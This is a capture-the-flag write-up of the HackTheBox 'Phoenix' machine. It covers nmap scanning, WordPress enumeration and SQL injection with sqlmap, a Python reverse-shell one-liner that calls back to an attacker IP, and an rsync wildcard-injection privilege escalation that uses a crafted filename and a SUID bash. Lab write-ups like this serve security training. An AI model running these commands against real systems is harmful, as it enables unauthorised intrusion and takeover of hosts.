HackTheBox-Phoenix

NMAP

PORT     STATE SERVICE  VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: Did not follow redirect to https://phoenix.htb/
443/tcp open ssl/http Apache httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache
|_http-title: Did not follow redirect to https://phoenix.htb/
| ssl-cert: Subject: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Issuer: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-02-15T20:08:43
| Not valid after: 2032-02-13T20:08:43
| MD5: 320f c0ee 2f18 bd78 3abc e9d8 66a6 fc26
|_SHA-1: 6879 3f3b c7d3 a517 6785 bcc7 a726 51ce 8827 4a68
| tls-alpn:
|_ http/1.1
8888/tcp open http SimpleHTTPServer 0.6 (Python 3.8.10)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80/443 (HTTP/HTTPS)

Visiting port 80 it’s going to redirect us to port 443 on phoenix.htb domain so let's add this to hosts file

wpscan --url https://phoenix.htb --disable-tls-checks -e ap -v
sqlmap -u "https://phoenix.htb/forum/?subscribe_topic=1" --level=2 --risk=2 --batch
sqlmap -u "https://phoenix.htb/forum/?subscribe_topic=1" --level=2 --risk=2 --sql-query="SELECT optio
n_value FROM wp_options WHERE option_name = 'active_plugins';" --batch
  • accordion-slider-gallery
  • adminimize
  • asgaros-forum
  • download-from-files

Foothold

I tried checking exploits for accordion and adminize but they were way too old so I looked up exploit on download-from-files and it was having a recent vulnerability regarding arbitary file upload

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.124",2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Privilege Escalation (editor)

So mini orange was a rabbit hole and it’s a 2FA being used on wordpress, Looking in the configuration file for ssh it’s google authenticator is and seems that there’s a PAM module configured with ssh

NOW=$(date +"%Y-%m-%d-%H-%M")
FILE="phoenix.htb.$NOW.tar"
cd /backups
mysqldump -u root wordpress > dbbackup.sql
tar -cf $FILE dbbackup.sql && rm dbbackup.sql
gzip -9 $FILE
find . -type f -mmin +30 -delete
rsync --ignore-existing -t *.* jit@10.11.12.14:/backups/
  1. This script is first running the data command and saving it in NOW variable
  2. FILE variable is having the archive name with the time timestamp
  3. It’s switching to /backups directory
  4. Running mysqldump to create a dump of wordpress database and saving it in dbbackup.sql file
  5. Creating a tar archive of dbbackup.sql file and removing it
  6. Creating gzip archive out of tar archive
  7. Running find command to check if the file was modified in the last 30 minutes if it was then it deletes the file
  8. And in the end it’s using rsync which is used for transferring files remotely and here it's vulnerable to command injection because it has *.* meaning that it’s transferring every file from the /backups directory
chmod +s /bin/bash
touch -- "-e sh script.sh"

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store